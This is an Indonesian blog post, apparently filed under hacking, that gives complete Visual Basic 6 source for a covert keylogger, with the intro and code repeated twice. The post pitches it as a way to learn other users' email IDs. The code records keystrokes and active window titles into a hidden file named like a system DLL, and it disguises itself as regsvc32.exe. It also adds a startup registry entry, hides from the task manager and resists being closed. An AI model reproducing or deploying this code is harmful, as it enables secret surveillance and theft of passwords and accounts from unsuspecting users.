Keylogger
Mungkin kita semua sudah sering mendengar tentang KeyLogger. Yeah.. KeyLogger adalah software yg mencatat gerak-gerik, atau aktifitas tombol yg kita tekan pada keyboard di sebuah Komputer. KeyLogger kemudian mencatat semua informasi pada sebuah catatan(LOG). Hmm.. dengan keylogger ini kita bisa mengetahui aktivitas user. Misalnya aja user habis buka E-mail, kamu bakalan tau ID-nya si User :D
Okay... berikut ini source code KeyLogger yang bisa kamu compile pake VB6. Kita hanya butuh sebuah timer dan module.
Yang perlu diperhatikan :
1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:
(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)
3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)
4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig
5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad
6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user ... :(
======= code mulai ==========================
'simpan file hasil compile dg nama regsvc32.exe
'form
'simpan dg nama FRMLOG.frm
Option Explicit
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private sAppName As String
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Const RSP_SIMPLE_SERVICE = 1
Private Const RSP_UNREGISTER_SERVICE = 0
Private Const VK_BACK = &H8
Private Const VK_CONTROL = &H11
Private Const VK_SHIFT = &H10
Private Const VK_TAB = &H9
Private Const VK_RETURN = &HD
Private Const VK_MENU = &H12
Private Const VK_ESCAPE = &H1B
Private Const VK_CAPITAL = &H14
Private Const VK_SPACE = &H20
Private Const VK_SNAPSHOT = &H2C
Private Const VK_UP = &H26
Private Const VK_DOWN = &H28
Private Const VK_LEFT = &H25
Private Const VK_RIGHT = &H27
Private Const VK_MBUTTON = &H4
Private Const VK_RBUTTON = &H2
Private Const VK_LBUTTON = &H1
Private Const VK_PERIOD = &HBE
Private Const VK_COMMA = &HBC
Private Const VK_NUMLOCK = &H90
Private Const VK_NUMPAD0 = &H60
Private Const VK_NUMPAD1 = &H61
Private Const VK_NUMPAD2 = &H62
Private Const VK_NUMPAD3 = &H63
Private Const VK_NUMPAD4 = &H64
Private Const VK_NUMPAD5 = &H65
Private Const VK_NUMPAD6 = &H66
Private Const VK_NUMPAD7 = &H67
Private Const VK_NUMPAD8 = &H68
Private Const VK_NUMPAD9 = &H69
Private Const VK_F9 = &H78
Private Const VK_F8 = &H77
Private Const VK_F7 = &H76
Private Const VK_F6 = &H75
Private Const VK_F5 = &H74
Private Const VK_F4 = &H73
Private Const VK_F3 = &H72
Private Const VK_F2 = &H71
Private Const VK_F12 = &H7B
Private Const VK_F11 = &H7A
Private Const VK_F10 = &H79
Private Const VK_F1 = &H70
Private Sub LoadTextFile()
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & "settings.ini" For Input As #1
Line Input #1, sAppName
Close
Else
Open App.Path & "\settings.ini" For Input As #1
Line Input #1, sAppName
Close
End If
If sAppName = vbNullString Then
sAppName = "regsvc32"
End If
Exit Sub
dlgerror:
sAppName = "regsvc32"
End Sub
Private Sub SAVEDLL()
Dim nSaveLocation As String
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & sAppName & ".dll" For Append As #1
nSaveLocation = App.Path & sAppName & ".dll"
GoTo READY
Else
Open App.Path & "\" & sAppName & ".dll" For Append As #1
nSaveLocation = App.Path & "\" & sAppName & ".dll"
GoTo READY
End If
READY:
If txtLOGGED.Text = vbNullString Then
Exit Sub
End If
Print #1, Time & " " & Date & vbCrLf & "Size: " & Format(FileLen(nSaveLocation) / 1000000, ".0") & " MB" & vbCrLf & "*** PROGRAMS OPENED ***" & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf
Close
Close
Close
SetAttr nSaveLocation, vbHidden
Exit Sub
dlgerror:
Err.Clear
Exit Sub
End Sub
Private Sub Form_Load()
On Error Resume Next
Call LoadTextFile
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = sAppName
ENTERREGISTRY
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub ENTERREGISTRY()
Dim nKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", nKey
If Len(App.Path) <= 3 Then
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & ".exe", Len(App.Path & App.EXEName & ".exe")
Else
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & "\" & App.EXEName & ".exe", Len(App.Path & "\" & App.EXEName & ".exe")
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = True
Call SAVEDLL
ENTERREGISTRY
Unload Me
End
End Sub
Private Sub tmrCAPTION_Timer()
On Error Resume Next
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = False
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub tmrLOG_Timer()
On Error Resume Next
Dim nKey, nChar As Integer
Dim nText As String
For nChar = 1 To 255
nKey = GetAsyncKeyState(nChar)
If nKey = -32767 Then
nText = Chr(nChar)
If nChar = VK_BACK Then
nText = " {B.S} "
ElseIf nChar = VK_CONTROL Then
nText = " {CTRL} "
ElseIf nChar = VK_SHIFT Then
nText = " {SHIFT} "
ElseIf nChar = VK_TAB Then
nText = " {TAB} "
ElseIf nChar = VK_RETURN Then
nText = " {ENTER} "
ElseIf nChar = VK_MENU Then
nText = " {ALT} "
ElseIf nChar = VK_ESCAPE Then
nText = " {ESC} "
ElseIf nChar = VK_CAPITAL Then
nText = " {CAPS} "
ElseIf nChar = VK_SPACE Then
nText = " {SP.B} "
ElseIf nChar = VK_UP Then
nText = " {UP} "
ElseIf nChar = VK_LEFT Then
nText = " {LEFT} "
ElseIf nChar = VK_RIGHT Then
nText = " {RIGHT} "
ElseIf nChar = VK_DOWN Then
nText = " {DOWN} "
ElseIf nChar = VK_F1 Then
nText = " {F1} "
ElseIf nChar = VK_F2 Then
nText = " {F2} "
ElseIf nChar = VK_F3 Then
nText = " {F3} "
ElseIf nChar = VK_F4 Then
nText = " {F4} "
ElseIf nChar = VK_F5 Then
nText = " {F5} "
ElseIf nChar = VK_F6 Then
nText = " {F6} "
ElseIf nChar = VK_F7 Then
nText = " {F7} "
ElseIf nChar = VK_F8 Then
nText = " {F8} "
ElseIf nChar = VK_F9 Then
nText = "{F9}"
ElseIf nChar = VK_F10 Then
nText = " {F10} "
ElseIf nChar = VK_F11 Then
nText = " {F11} "
ElseIf nChar = VK_F12 Then
nText = " {F12} "
ElseIf nChar = VK_SNAPSHOT Then
nText = " {PRINT SCRN} "
ElseIf nChar = VK_RBUTTON Then
nText = " {R.B} "
ElseIf nChar = VK_LBUTTON Then
nText = " {L.B} "
ElseIf nChar = VK_MBUTTON Then
nText = " {M.B} "
ElseIf nChar = VK_PERIOD Then
nText = "."
ElseIf nChar = VK_COMMA Then
nText = ","
ElseIf nChar = VK_NUMLOCK Then
nText = " {NUMLCK} "
ElseIf nChar = VK_NUMPAD0 Then
nText = "0"
ElseIf nChar = VK_NUMPAD1 Then
nText = "1"
ElseIf nChar = VK_NUMPAD2 Then
nText = "2"
ElseIf nChar = VK_NUMPAD3 Then
nText = "3"
ElseIf nChar = VK_NUMPAD4 Then
nText = "4"
ElseIf nChar = VK_NUMPAD5 Then
nText = "5"
ElseIf nChar = VK_NUMPAD6 Then
nText = "6"
ElseIf nChar = VK_NUMPAD7 Then
nText = "7"
ElseIf nChar = VK_NUMPAD8 Then
nText = "8"
ElseIf nChar = VK_NUMPAD9 Then
nText = "9"
End If
txtLOGGED.Text = txtLOGGED.Text + nText
End If
Next
Call GetActiveWindowName
End Sub
Private Sub tmrSAVE_Timer()
Call SAVEDLL
txtLOGGED.Text = vbNullString
txtENUMERATE.Text = vbNullString
End Sub
====code end ===========
============code mulai ============
'module visual basic
'simpan dg nama mdlActiveWindow.bas
Option Explicit
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public nCAPTION As String
Public nTESTER As Long
Public nClass As String
Public Sub GetActiveWindowName()
nCAPTION = Space(256)
nClass = Space(256)
GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)
GetClassName GetForegroundWindow, nClass, Len(nClass)
If nTESTER = GetForegroundWindow Then Exit Sub
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & " " & nCAPTION
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass
nTESTER = GetForegroundWindow
End Sub
============ code end ==========
/* ------------------------------|EOF|------------------------------ */
Okay... berikut ini source code KeyLogger yang bisa kamu compile pake VB6. Kita hanya butuh sebuah timer dan module.
Yang perlu diperhatikan :
1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting:
(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del)
3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows)
4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig
5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad
6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user ... :(
======= code mulai ==========================
'simpan file hasil compile dg nama regsvc32.exe
'form
'simpan dg nama FRMLOG.frm
Option Explicit
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private sAppName As String
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Const RSP_SIMPLE_SERVICE = 1
Private Const RSP_UNREGISTER_SERVICE = 0
Private Const VK_BACK = &H8
Private Const VK_CONTROL = &H11
Private Const VK_SHIFT = &H10
Private Const VK_TAB = &H9
Private Const VK_RETURN = &HD
Private Const VK_MENU = &H12
Private Const VK_ESCAPE = &H1B
Private Const VK_CAPITAL = &H14
Private Const VK_SPACE = &H20
Private Const VK_SNAPSHOT = &H2C
Private Const VK_UP = &H26
Private Const VK_DOWN = &H28
Private Const VK_LEFT = &H25
Private Const VK_RIGHT = &H27
Private Const VK_MBUTTON = &H4
Private Const VK_RBUTTON = &H2
Private Const VK_LBUTTON = &H1
Private Const VK_PERIOD = &HBE
Private Const VK_COMMA = &HBC
Private Const VK_NUMLOCK = &H90
Private Const VK_NUMPAD0 = &H60
Private Const VK_NUMPAD1 = &H61
Private Const VK_NUMPAD2 = &H62
Private Const VK_NUMPAD3 = &H63
Private Const VK_NUMPAD4 = &H64
Private Const VK_NUMPAD5 = &H65
Private Const VK_NUMPAD6 = &H66
Private Const VK_NUMPAD7 = &H67
Private Const VK_NUMPAD8 = &H68
Private Const VK_NUMPAD9 = &H69
Private Const VK_F9 = &H78
Private Const VK_F8 = &H77
Private Const VK_F7 = &H76
Private Const VK_F6 = &H75
Private Const VK_F5 = &H74
Private Const VK_F4 = &H73
Private Const VK_F3 = &H72
Private Const VK_F2 = &H71
Private Const VK_F12 = &H7B
Private Const VK_F11 = &H7A
Private Const VK_F10 = &H79
Private Const VK_F1 = &H70
Private Sub LoadTextFile()
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & "settings.ini" For Input As #1
Line Input #1, sAppName
Close
Else
Open App.Path & "\settings.ini" For Input As #1
Line Input #1, sAppName
Close
End If
If sAppName = vbNullString Then
sAppName = "regsvc32"
End If
Exit Sub
dlgerror:
sAppName = "regsvc32"
End Sub
Private Sub SAVEDLL()
Dim nSaveLocation As String
On Error GoTo dlgerror
If Len(App.Path) <= 3 Then
Open App.Path & sAppName & ".dll" For Append As #1
nSaveLocation = App.Path & sAppName & ".dll"
GoTo READY
Else
Open App.Path & "\" & sAppName & ".dll" For Append As #1
nSaveLocation = App.Path & "\" & sAppName & ".dll"
GoTo READY
End If
READY:
If txtLOGGED.Text = vbNullString Then
Exit Sub
End If
Print #1, Time & " " & Date & vbCrLf & "Size: " & Format(FileLen(nSaveLocation) / 1000000, ".0") & " MB" & vbCrLf & "*** PROGRAMS OPENED ***" & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf
Close
Close
Close
SetAttr nSaveLocation, vbHidden
Exit Sub
dlgerror:
Err.Clear
Exit Sub
End Sub
Private Sub Form_Load()
On Error Resume Next
Call LoadTextFile
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = sAppName
ENTERREGISTRY
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub ENTERREGISTRY()
Dim nKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", nKey
If Len(App.Path) <= 3 Then
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & ".exe", Len(App.Path & App.EXEName & ".exe")
Else
RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & "\" & App.EXEName & ".exe", Len(App.Path & "\" & App.EXEName & ".exe")
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = True
Call SAVEDLL
ENTERREGISTRY
Unload Me
End
End Sub
Private Sub tmrCAPTION_Timer()
On Error Resume Next
Me.Caption = sAppName
Me.Visible = False
App.TaskVisible = False
App.Title = False
RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
End Sub
Private Sub tmrLOG_Timer()
On Error Resume Next
Dim nKey, nChar As Integer
Dim nText As String
For nChar = 1 To 255
nKey = GetAsyncKeyState(nChar)
If nKey = -32767 Then
nText = Chr(nChar)
If nChar = VK_BACK Then
nText = " {B.S} "
ElseIf nChar = VK_CONTROL Then
nText = " {CTRL} "
ElseIf nChar = VK_SHIFT Then
nText = " {SHIFT} "
ElseIf nChar = VK_TAB Then
nText = " {TAB} "
ElseIf nChar = VK_RETURN Then
nText = " {ENTER} "
ElseIf nChar = VK_MENU Then
nText = " {ALT} "
ElseIf nChar = VK_ESCAPE Then
nText = " {ESC} "
ElseIf nChar = VK_CAPITAL Then
nText = " {CAPS} "
ElseIf nChar = VK_SPACE Then
nText = " {SP.B} "
ElseIf nChar = VK_UP Then
nText = " {UP} "
ElseIf nChar = VK_LEFT Then
nText = " {LEFT} "
ElseIf nChar = VK_RIGHT Then
nText = " {RIGHT} "
ElseIf nChar = VK_DOWN Then
nText = " {DOWN} "
ElseIf nChar = VK_F1 Then
nText = " {F1} "
ElseIf nChar = VK_F2 Then
nText = " {F2} "
ElseIf nChar = VK_F3 Then
nText = " {F3} "
ElseIf nChar = VK_F4 Then
nText = " {F4} "
ElseIf nChar = VK_F5 Then
nText = " {F5} "
ElseIf nChar = VK_F6 Then
nText = " {F6} "
ElseIf nChar = VK_F7 Then
nText = " {F7} "
ElseIf nChar = VK_F8 Then
nText = " {F8} "
ElseIf nChar = VK_F9 Then
nText = "{F9}"
ElseIf nChar = VK_F10 Then
nText = " {F10} "
ElseIf nChar = VK_F11 Then
nText = " {F11} "
ElseIf nChar = VK_F12 Then
nText = " {F12} "
ElseIf nChar = VK_SNAPSHOT Then
nText = " {PRINT SCRN} "
ElseIf nChar = VK_RBUTTON Then
nText = " {R.B} "
ElseIf nChar = VK_LBUTTON Then
nText = " {L.B} "
ElseIf nChar = VK_MBUTTON Then
nText = " {M.B} "
ElseIf nChar = VK_PERIOD Then
nText = "."
ElseIf nChar = VK_COMMA Then
nText = ","
ElseIf nChar = VK_NUMLOCK Then
nText = " {NUMLCK} "
ElseIf nChar = VK_NUMPAD0 Then
nText = "0"
ElseIf nChar = VK_NUMPAD1 Then
nText = "1"
ElseIf nChar = VK_NUMPAD2 Then
nText = "2"
ElseIf nChar = VK_NUMPAD3 Then
nText = "3"
ElseIf nChar = VK_NUMPAD4 Then
nText = "4"
ElseIf nChar = VK_NUMPAD5 Then
nText = "5"
ElseIf nChar = VK_NUMPAD6 Then
nText = "6"
ElseIf nChar = VK_NUMPAD7 Then
nText = "7"
ElseIf nChar = VK_NUMPAD8 Then
nText = "8"
ElseIf nChar = VK_NUMPAD9 Then
nText = "9"
End If
txtLOGGED.Text = txtLOGGED.Text + nText
End If
Next
Call GetActiveWindowName
End Sub
Private Sub tmrSAVE_Timer()
Call SAVEDLL
txtLOGGED.Text = vbNullString
txtENUMERATE.Text = vbNullString
End Sub
====code end ===========
============code mulai ============
'module visual basic
'simpan dg nama mdlActiveWindow.bas
Option Explicit
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public nCAPTION As String
Public nTESTER As Long
Public nClass As String
Public Sub GetActiveWindowName()
nCAPTION = Space(256)
nClass = Space(256)
GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)
GetClassName GetForegroundWindow, nClass, Len(nClass)
If nTESTER = GetForegroundWindow Then Exit Sub
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & " " & nCAPTION
FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass
nTESTER = GetForegroundWindow
End Sub
============ code end ==========
/* ------------------------------|EOF|------------------------------ */
Categories:
Hacking
0 komentar:
Posting Komentar